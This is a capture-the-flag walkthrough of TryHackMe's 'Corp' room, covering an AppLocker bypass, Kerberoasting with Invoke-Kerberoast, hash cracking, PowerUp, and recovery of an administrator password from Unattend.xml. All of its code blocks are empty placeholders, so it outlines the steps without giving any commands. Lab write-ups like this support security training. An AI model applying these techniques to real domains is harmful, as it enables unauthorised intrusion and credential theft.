Bypass AppLocker whitelisting and capture Kerberos tickets to escalate attack. Technical walkthrough of completing Corp Room on the TryHackMe platform.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk. By continued reading, you acknowledge the aforementioned user risks/responsibilities.
Bypassing Applocker
Applocker is a windows application used to whitelist programs that are allow on a specific user account. Further it allows users to only execute programs based on paths to include specific application publishers.
bypass app locker
Bypass can occur by places executables within the directory:
1 |
|
Using powershell to download nc
executable to directory:
1 |
|
nc.exe
successfully executes within the folder bypassing the app locker.
Powershell history location:
1 |
|
Print contents of bash history:
1 |
|
Kerberoasting
Extract spn’s from windows
1 |
|
(output)
1 |
|
User enumeated to CN=fela,CN=Users,DC=corp,DC=Local
Empire - Invoke-Kerberoast
Github link: https://github.com/EmpireProject/Empire
Upload Invoke-Kerberoast.ps1
to target:
1 |
|
Add line insdie Invoke-Kerberoast.ps1:
1 |
|
TGT Service Hash (needs to be one line)
1 |
|
Crack Kerboeros 5 TGS Hash
1 |
|
Login as User
started session with xfreerdp
1 |
|
Escalate Privileges with PowerUp.ps1
download to target:
1 |
|
(caught by AV in my case)
Check Unattened.xml for cleartext passwords
1 |
|
Password is Base64 encoded by default
Login as Administrator
1 |
|
Capture Flag
located at C:\Users\Administrator\Desktop\flag.txt